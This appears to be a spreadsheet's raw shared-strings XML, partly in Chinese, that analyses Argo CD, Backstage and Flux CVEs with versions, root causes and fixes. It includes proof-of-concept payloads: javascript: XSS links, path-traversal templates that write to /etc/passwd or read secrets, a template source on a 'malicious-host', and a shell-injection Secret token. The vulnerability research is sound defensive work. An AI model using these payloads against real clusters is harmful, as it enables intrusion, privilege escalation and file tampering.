https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw</t>
  </si>
  <si>
    <t>用户需要具有以下权限之一：
- applications, create 权限
- applications, update 权限
触发点：
- 通过 Argo CD API 创建或更新应用
- 可以通过 UI 或 CLI 操作</t>
  </si>
  <si>
    <t>a) 基本攻击：
   - 尝试创建/更新应用程序
   - 观察错误消息获取凭证
b) 强制触发错误：
   - 通过频繁请求触发上游仓库的速率限制
   - 如果有 repositories, update 权限，可以：
     * 编辑现有仓库引入 URL 错误
     * 强制产生错误消息</t>
  </si>
  <si>
    <t>信息泄露</t>
  </si>
  <si>
    <t>是
触发条件是创建资源但非往资源字段注入内容导致错误最终导致输出敏感信息</t>
  </si>
  <si>
    <t>校验缺失（sanitizer缺失）</t>
  </si>
  <si>
    <t>错误触发注入
配置字段注入</t>
  </si>
  <si>
    <t>repositories.url</t>
  </si>
  <si>
    <t>信息输出</t>
  </si>
  <si>
    <t>errMessage = fmt.Sprintf("repositories not accessible: %v", repo)</t>
  </si>
  <si>
    <t xml:space="preserve">添加sanitizer( 非check ,mask函数）
</t>
  </si>
  <si>
    <t>CVE-2022-31035 (ada logic fuzzer 发现）</t>
  </si>
  <si>
    <t>ada logic 2022安全审计报告有详细信息：ADA-ARGO-SA-02: XSS: External URLs for Deployments can
include javascript</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>External URLs for Deployments can include javascript：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>All unpatched versions of Argo CD starting with v1.0.0 are vulnerable to a cross-site scripting (XSS) bug allowing a malicious user to inject a javascript: link in the UI. When clicked by a victim user, the script will execute with the victim's permissions (up to and including admin).
The script would be capable of doing anything which is possible in the UI or via the API, such as creating, modifying, and deleting Kubernetes resources.</t>
    </r>
  </si>
  <si>
    <t>1.0.0 through 2.1.15, 2.2.9, 2.3.4, 2.4.0</t>
  </si>
  <si>
    <t>2.1.16, 2.2.10, 2.3.5, 2.4.1
https://github.com/argoproj/argo-cd/commit/8bc3ef690de29c68a36f473908774346a44d4038</t>
  </si>
  <si>
    <t>https://github.com/argoproj/argo-cd/security/advisories/GHSA-h4w9-6x78-8vrj</t>
  </si>
  <si>
    <t xml:space="preserve"> - 攻击者需要有权限向 Deployment 添加/修改注解（annotations）
- 受害者需要访问 Argo CD 仪表板
- 受害者需要点击注入的外部链接</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>步骤 1：注入恶意链接
- 攻击者修改 Deployment 配置
- 添加特定注解：link.argocd.argoproj.io/external-link
- 设置恶意 JavaScript URL，如：javascript:alert(1337)
步骤 2：等待同步
- Argo CD 同步配置
- 在仪表板上生成可点击的图标
- 所有有权访问的用户都能看到该链接
步骤 3：触发攻击
- 受害者访问 Argo CD 仪表板
- 点击外部链接图标
- 触发 XSS 攻击执行恶意 JavaScript</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
ada logic 2022安全审计报告有详细信息：ADA-ARGO-SA-02: XSS: External URLs for Deployments can
include javascript</t>
    </r>
  </si>
  <si>
    <t>xss-&gt;提权</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">deployment.annotation
link.argocd.argoproj.io/external-link
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>攻击示例：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
apiVersion: apps/v1
kind: Deployment
metadata:
  annotations:
    link.argocd.argoproj.io/external-link: "javascript:alert(1337)"
  name: vulnerable-deployment
spec:
  # ... 部署配置</t>
    </r>
  </si>
  <si>
    <t>ui前端</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>加check</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
a) URL 验证：
   - 检查 URL 格式是否有效
   - 禁止危险的协议（javascript:, data:）
   - 支持相对 URL 验证
b) 错误处理：
   - 使用自定义错误类型
   - 优雅处理无效 URL
   - 防止错误导致整体功能失效
c) 安全机制：
   - 构造时强制验证
   - 失败时抛出异常
   - 隔离无效输入</t>
    </r>
  </si>
  <si>
    <t>ADA-ARGO-SA-01: XSS in Argo CD Chat URL</t>
  </si>
  <si>
    <t>Argo CD allows admin users to add a button in the bottom right corner of the page. The intended use case is to provide the means to link to a support channel such as Slack, a help page with FAQ’s or to a live chat with a support team. The button is susceptible to an XSS attack due to lack of sanitization of the URL. An attacker who coontrols the Config Map can specify javascript to be run when a user clicks the “help” button.</t>
  </si>
  <si>
    <t>权限要求：
- 需要有权限修改 argocd-cm ConfigMap
- 通常需要管理员级别权限
环境要求：
- Argo CD 启用了帮助功能
- 支持自定义 chatUrl 配置</t>
  </si>
  <si>
    <t>步骤 1：修改配置
- 攻击者修改 argocd-cm ConfigMap
- 注入恶意 JavaScript 代码
步骤 2：部署配置
kubectl apply -n argocd -f argocd-cm.yaml
步骤 3：等待触发
- 恶意按钮出现在页面右下角
- 等待用户点击 "Chat now!" 按钮
- 触发 XSS 执行</t>
  </si>
  <si>
    <t>ConfigMap
apiVersion: v1
kind: ConfigMap
metadata:
  name: argocd-cm
  namespace: argocd
data:
  # 注入恶意 JavaScript
  help.chatUrl: "javascript:alert(1337)"
  help.chatText: "Chat now!"  # 诱导性文本</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>CVE-2021-43783 (待确定) 与SPBS-CR-22-05: Information Leakage through Misconfiguration via Tem</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>_x0002_</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>plates类似</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> - 在模板执行过程中存在路径遍历问题
- 可以写入文件到任意路径
- 可能通过用户输入触发
- 在某些情况下可控制文件内容</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>@backstage/plugin-scaffolder-backend is the backend for the default Backstage software templates. In affected versions a malicious actor with write access to a</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> registered scaffolder template </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>is able to manipulate the template in a way that writes files to arbitrary paths on the scaffolder-backend host instance. This vulnerability can in some situation also be exploited through user input when executing a template, meaning you do not need write access to the templates. This method will not allow the attacker to control the contents of the injected file however, unless the template is also crafted in a specific way that gives control of the file contents. This vulnerability is fixed in version `0.15.14` of the `@backstage/plugin-scaffolder-backend`. This attack is mitigated by restricting access and requiring reviews when registering or modifying scaffolder templates.
（控制templates)</t>
    </r>
  </si>
  <si>
    <t>&lt;0.15,14</t>
  </si>
  <si>
    <t>0.15.14
https://github.com/backstage/backstage/commit/f9352ab606367cd9efc6ff048915c70ed3013b7f</t>
  </si>
  <si>
    <t>backstage</t>
  </si>
  <si>
    <t>条件一：
- 拥有模板写入权限
- 能够注册或修改模板
条件二：
- 只需要模板执行权限
- 能够提供用户输入</t>
  </si>
  <si>
    <t>场景一：模板权限攻击
- 攻击者拥有模板写入权限
- 创建/修改恶意模板
- 导致任意路径写入
场景二：用户输入攻击
- 不需要模板写入权限
- 通过特制的用户输入
- 触发路径遍历
- 但不能控制文件内容
场景三：组合攻击
- 特制模板 + 用户输入
- 可以控制写入路径和内容</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">template crd+location crd
注册恶意模板
↓
模板被系统接受
↓
触发模板执行
↓
文件被写入任意路径
---
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>template crd:</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
apiVersion: scaffolder.backstage.io/v1beta3
kind: Template
metadata:
  name: malicious-template
  description: "A template for demonstration"
spec:
  owner: default/team
  type: service
  steps:
    - id: fetch
      name: Fetch Files
      action: fetch:template
      input:
        url: ./template
        values:
          dest: "../../../../etc/passwd"  # 路径遍历攻击
    - id: write
      name: Write Files
      action: fs:write
      input:
        path: "{{steps.fetch.output.dest}}"  # 引用遍历路径
        contents: |
          malicious content
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>---</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">location crd:
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">apiVersion: backstage.io/v1alpha1
kind: Location
metadata:
  name: malicious-location
spec:
  type: url
  target: http://malicious-host/templates  # 指向恶意模板源
</t>
    </r>
  </si>
  <si>
    <t>更改sink点-&gt; 使用更安全的api</t>
  </si>
  <si>
    <t>CVE-2023-35926</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>这个漏洞是由于依赖的第三方库（vm2）的安全问题导致的</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
- 使用 vm2 作为模板沙箱库
- vm2 存在多个已知漏洞
- 可能导致沙箱逃逸
- 允许在模板中执行任意代码</t>
    </r>
  </si>
  <si>
    <t>The Backstage scaffolder-backend plugin uses a templating library that requires a sandbox, as it by design allows for code injection. The library used for this sandbox so far has been vm2, but in light of several past vulnerabilities and existing vulnerabilities that may not have a fix, the plugin has switched to using a different sandbox library.</t>
  </si>
  <si>
    <t>&lt;v1.15.0</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">v1.15.0
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>https://github.com/backstage/backstage/commit/fb7375507d56faedcb7bb3665480070593c8949a</t>
    </r>
  </si>
  <si>
    <t>https://github.com/backstage/backstage/security/advisories/GHSA-wg6p-jmpc-xjmr</t>
  </si>
  <si>
    <t>需要满足：
- 对注册的 scaffolder 模板有写入权限
- 能够修改模板的 YAML 定义
- 仅通过模板定义触发，不能通过用户输入</t>
  </si>
  <si>
    <t>步骤 1：创建恶意模板
apiVersion: scaffolder.backstage.io/v1beta3
kind: Template
metadata:
  name: exploit-template
  description: "Malicious Template"
spec:
  parameters: []
  steps:
    - id: malicious-step
      name: Execute Code
      action: node:eval
      input:
        # 注入利用 vm2 沙箱逃逸的代码
        code: |
          const vm2Exploit = `
            // vm2 沙箱逃逸代码
            // 可能利用原型污染等技术
          `;
          // 执行系统命令或其他恶意操作
步骤 2：注册模板
- 将恶意模板提交到 Backstage
- 等待模板被系统接受
步骤 3：触发执行
- 模板被加载和执行
- vm2 沙箱被逃逸
- 获得宿主机代码执行权限
步骤 4：利用后续
- 执行任意系统命令
- 获取敏感信息
- 持久化访问</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"># 恶意模板示例
apiVersion: scaffolder.backstage.io/v1beta3
kind: Template
metadata:
  name: malicious-template
spec:
  steps:
    - id: exploit
      action: custom
      input:
        # 包含可逃逸 vm2 沙箱的代码
      </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">  code: |
          // 恶意代码，利用 vm2 漏洞
          # 可能导致远程代码执行</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">sink点在不安全的第三方库中： vm2
- 使用 vm2 作为模板沙箱库
- vm2 存在多个已知漏洞
- 可能导致沙箱逃逸
- 允许在模板中执行任意代码
-&gt; 不确定具体的关键操作函数
关键点：
- vm2 沙箱的安全限制被绕过
- 模板执行环境被突破
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>- 代码在宿主系统执行</t>
    </r>
  </si>
  <si>
    <t>更改sink点，使用更安全的api
使用isolated-vm 替换vm2 库</t>
  </si>
  <si>
    <t>CVE-2021-41151</t>
  </si>
  <si>
    <t>A malicious actor could read sensitive files from the environment where Scaffolder tasks are run. The attack is executed by crafting a custom Scaffolder template with a publish:github:pull-request action using a particular source path. When the template is executed the sensitive files would be included in the published pull request.
This vulnerability is mitigated by the fact that an attacker would need access to create and register templates in the Backstage catalog, and that the attack is very visible given that the exfiltration happens via a pull request.</t>
  </si>
  <si>
    <t>&gt;=0.9.4 &lt;0.15.9</t>
  </si>
  <si>
    <t>0.15.9
https://github.com/backstage/backstage/pull/7644</t>
  </si>
  <si>
    <t>https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673</t>
  </si>
  <si>
    <t>需要满足：
- 有创建和注册模板的权限
- 目标系统开启了 GitHub PR 功能
- 知道要泄露的文件路径</t>
  </si>
  <si>
    <t>步骤 1：创建恶意模板
- 构造包含路径遍历的模板
- 使用 publish:github:pull-request action
步骤 2：注册模板
- 将模板提交到 Backstage
- 等待模板被接受
步骤 3：执行模板
- 触发模板执行
- 读取敏感文件
- 创建包含敏感信息的 PR
步骤 4：获取信息
- 通过 GitHub PR 查看泄露的文件内容</t>
  </si>
  <si>
    <t>提权-&gt; 信息泄露</t>
  </si>
  <si>
    <t>apiVersion: scaffolder.backstage.io/v1beta3
kind: Template
metadata:
  name: malicious-template
spec:
  steps:
    - id: leak
      name: Create PR
      action: publish:github:pull-request
      input:
        sourcePath: "../../../etc/secrets"  # 路径遍历攻击
        # 或其他敏感文件路径
        branchName: feature/update
        title: "Update configuration"
        description: "Regular update"</t>
  </si>
  <si>
    <t xml:space="preserve">增加check
a) 路径合并：
   joinPath(workspacePath, safeSuffix)
b) 路径验证：
   isChildPath(workspacePath, path)
   // 确保最终路径在工作目录内
c) 错误处理：
   throw new Error('Invalid source path')
   // 当路径越界时抛出错误
</t>
  </si>
  <si>
    <t>CVE-2021-41254 (非常典型的例子-&gt; 存在间接资源引用注入）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> - 通过 Secret 中的 token 字符串注入命令
- 利用 kustomize-controller 的权限执行命令
- 可以提升到集群管理员权限
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>漏洞特点：
- 利用资源链接实现注入
- 跨越多个资源类型
- 利用控制器的高权限
- 影响集群安全 
adalogic 2021:Issue 1: Arbitrary command execution via
command injection in the kustomize controller
by way of secrets( ADA-FLUX-21-01)
其他： 可用于说明哪些字段可用于注入，哪些字段不可用于注入</t>
    </r>
  </si>
  <si>
    <t>Users that can create Kubernetes Secrets, Service Accounts and Flux Kustomization objects, could execute commands inside the kustomize-controller container by embedding a shell script in a Kubernetes Secret. This can be used to run kubectl commands under the Service Account of kustomize-controller, thus allowing an authenticated Kubernetes user to gain cluster admin privileges.</t>
  </si>
  <si>
    <t>&lt; v0.15.0</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">v0.15.0
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>2021.11.12 发布： GHSA-35rf-v2jv-gfg7
https://github.com/fluxcd/kustomize-controller/pull/426（直接更新reconciler)</t>
    </r>
  </si>
  <si>
    <t>https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7</t>
  </si>
  <si>
    <t>flux</t>
  </si>
  <si>
    <t>需要以下权限：
- 创建 Secrets 的权限
- 创建 ServiceAccounts 的权限
- 创建 Flux Kustomization 对象的权限</t>
  </si>
  <si>
    <t>步骤 1：创建包含命令的 Secret
kubectl create secret generic exploit-token \
  --from-literal=token=" || kubectl api-versions"
步骤 2：创建引用该 Secret 的 ServiceAccount
apiVersion: v1
kind: ServiceAccount
metadata:
  name: exploit
secrets:
- name: exploit-token
步骤 3：创建使用该 ServiceAccount 的 Kustomization
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
  name: exploit
spec:
  serviceAccountName: exploit</t>
  </si>
  <si>
    <t>直接注入（资源引用字段注入-&gt;secret 字段引用）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Kustomization
涉及3个资源
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>资源注入点在secret资源
字段：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
apiVersion: v1
kind: Secret
metadata:
  name: exploit-token
  namespace: default
type: Opaque
data:
  # 注入命令的字段（base64编码）
  token: "IHx8IGt1YmVjdGwgYXBpLXZlcnNpb25z"  # " || kubectl api-versions" 的 base64编码
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>这个 Secret 会被 ServiceAccount 引用，并最终被 kustomize-controller 以高权限执行。</t>
    </r>
  </si>
  <si>
    <t>资源字段间接引用</t>
  </si>
  <si>
    <t>内置资源+CRD资源</t>
  </si>
  <si>
    <t>安全与认证资源
元数据资源</t>
  </si>
  <si>
    <t>secret: 命名空间
Kustomization: 集群范围内的资源</t>
  </si>
  <si>
    <t>可直接定位fmt.sprintf() 构造字符串的位置进行后向切片</t>
  </si>
  <si>
    <t>代码注释： 存在代码注释，但缺少安全性说明
文档：无
验证逻辑： 不存在验证逻辑
错误信息提示:不存在错误信息
单元测试文件中进行测试：不存在测试</t>
  </si>
  <si>
    <t>资源引用：kustomization.Spec.ServiceAccountName 获取serviceaccount-&gt;基于 
secretName := types.NamespacedName{
  Namespace: ki.kustomization.Namespace,
  Name:      ki.kustomization.Spec.ServiceAccountName,
 } 获取对应的secret-&gt;
secret.token
命令注入： sa token被用于拼接命令行</t>
  </si>
  <si>
    <t>跨信任域： 应用开发-&gt; 集群运维
跨组件： 不存在跨组件（代码执行在kustomization_controller)</t>
  </si>
  <si>
    <t>存在验证</t>
  </si>
  <si>
    <t>直接赋值（ 直接用于字符串构造）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">命令执行-&gt; 命令构造（fmt.sprintf)
命令注入链：
Secret (命令注入) 
↓
ServiceAccount (引用 Secret)
↓
Kustomization (使用 ServiceAccount)
↓
kustomize-controller 执行命令
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>// 命令执行点应该在负责执行 kustomize build 或处理资源的代码中</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
// 可能在以下位置：
- 处理 Secret token 的位置
- 执行外部命令的组件
- shell 命令执行的包装器
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">https://github.com/fluxcd/kustomize-controller/blob/v0.14.1/controllers/kustomization_controller.go
saToken, err := imp.GetServiceAccountToken(ctx
cmd = fmt.Sprintf("%s --token %s", cmd, saToken)
command := exec.CommandContext(applyCtx, "/bin/sh", "-c", cmd)
外部函数：func (r *KustomizationReconciler) apply(ctx context.Context, kustomization kustomizev1.Kustomization, imp *KustomizeImpersonation, dirPath string) (string, error) 
和
func (r *KustomizationReconciler) validate(ctx context.Context, kustomization kustomizev1.Kustomization, imp *KustomizeImpersonation, dirPath string) error {
</t>
    </r>
  </si>
  <si>
    <t>资源协调过程</t>
  </si>
  <si>
    <t>不存在跨组件、跨应用</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>包装函数validate 和apply在执行错误后会返回特定的错误类型：
kustomizev1.KustomizationNotReady
1. 使用结构化错误返回、错误上下文丰富</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
2. 遵循控制器场景： 错误会反应在资源状态中</t>
    </r>
  </si>
  <si>
    <t>不存在跨组件的场景
命令执行场景：
控制器本身运行在 Kubernetes Pod 中，通过 shell 命令调用 kubectl 二进制文件来执行 apply 操作。</t>
  </si>
  <si>
    <t>调用深度：1
reconcile-&gt;apply/validate</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>准入控制插件：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
 prevent the creation of Kubernetes Service Accounts with `secrets` in namespaces owned by tenants, a Kubernetes validation webhook such as Gatekeeper OPA or Kyverno can be used.
- 阻止在租户命名空间创建带 secrets 的 ServiceAccount
- 切断攻击链的关键环节
- 防止权限提升攻击
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-sa
spec:
  validationFailureAction: enforce
  background: false
  rules:
    - name: validate-sa
      match:
        resources:
          kinds:
            - ServiceAccount
          namespaces:
            - tenant1
            - tenant2
        subjects:
          - kind: User
            name: some@tenant1.com
          - kind: User
            name: some@tenant2.com
          - kind: ServiceAccount
            name: kustomize-controller
            namespace: flux-system
          - kind: ServiceAccount
            name: helm-controller
            namespace: flux-system
      validate:
        message: "Invalid service account"
        pattern:
          X(secrets): "*?"
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>更改sink点-&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
在 kustomize-controller v0.15.0 中：
- 移除了执行 shell 命令的功能
- 从容器镜像中移除了 kubectl 二进制文件</t>
    </r>
  </si>
  <si>
    <t>控制器： 重构相关函数</t>
  </si>
  <si>
    <t>CVE-2022-39272（ 比较典型的字段 api--server 序列化和 控制器 反序列化过程中解析函数冲突导致的DOS漏洞）</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> - Duration 类型不兼容导致的问题：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
  Kubernetes metav1.Duration &lt;-&gt; Go time.Duration
- 缺乏对时间字段的值验证
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>类型解析和序列化不一致
Go类型 -&gt; CRD -&gt; CustomResource -&gt; API校验 -&gt; etcd存储 -&gt; 反序列化 -&gt; Go类型
问题本质：
// API 服务器使用 strfmt.ParseDuration
// 允许解析：d (天) 和 w (周)
strfmt.ParseDuration("1w")  // 有效
// 反序列化时使用 time.ParseDuration
// 只支持：ns, us, ms, s, m, h
time.ParseDuration("1w")    // 报错
a) CRD 定义：声明使用 time.ParseDuration
b) API 服务器：实际使用 strfmt.ParseDuration
c) 反序列化：使用 time.ParseDuration
导致：
- API 服务器接受 'd' 和 'w' 单位
- 但反序列化时无法处理这些单位</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Flux is an open and extensible continuous delivery solution for Kubernetes. Versions prior to 0.35.0 are subject to a Denial of Service. Users that have permissions to change Flux’s objects, either through a Flux source or directly within a cluster, can provide invalid data to fields `.spec.interval` or `.spec.timeout` (and structured variations of these fields), c</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>ausing the entire object type to stop being processed</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>. This issue is patched in version 0.35.0. As a workaround, Admission controllers can be employed to restrict the values that can be used for fields `</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>.spec.interval` and `.spec.timeout`</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>, however upgrading to the latest versions is still the recommended mitigation.</t>
    </r>
  </si>
  <si>
    <t>Package
 github.com/fluxcd/flux2 (
Go
)
Affected versions
&lt; v0.35.0 &gt;= v0.1.0
Patched versions
v0.35.0
 github.com/fluxcd/helm-controller (
Go
)
&lt; v0.24.0 &gt;= v0.0.1-alpha-1
v0.24.0
 github.com/fluxcd/image-automation-controller (
Go
)
&lt; v0.26.0 &gt;= v0.1.0
v0.26.0
 github.com/fluxcd/image-reflector-controller (
Go
)
&lt; v0.22.0 &gt;= v0.1.0
v0.22.0
 github.com/fluxcd/kustomize-controller (
Go
)
&lt; v0.29.0 &gt;= v0.0.1-alpha-1
v0.29.0
 github.com/fluxcd/notification-controller (
Go
)
&lt; v0.27.0 &gt;= v0.0.1-alpha-1
v0.27.0
 github.com/fluxcd/source-controller (
Go
)
&lt; v0.30.0 &gt;= v0.0.1-alpha-1
v0.30.0</t>
  </si>
  <si>
    <t>https://github.com/fluxcd/source-controller/pull/903/commits/27f4ed5a472d1bd5b6bc7a62189f20c115338b3a</t>
  </si>
  <si>
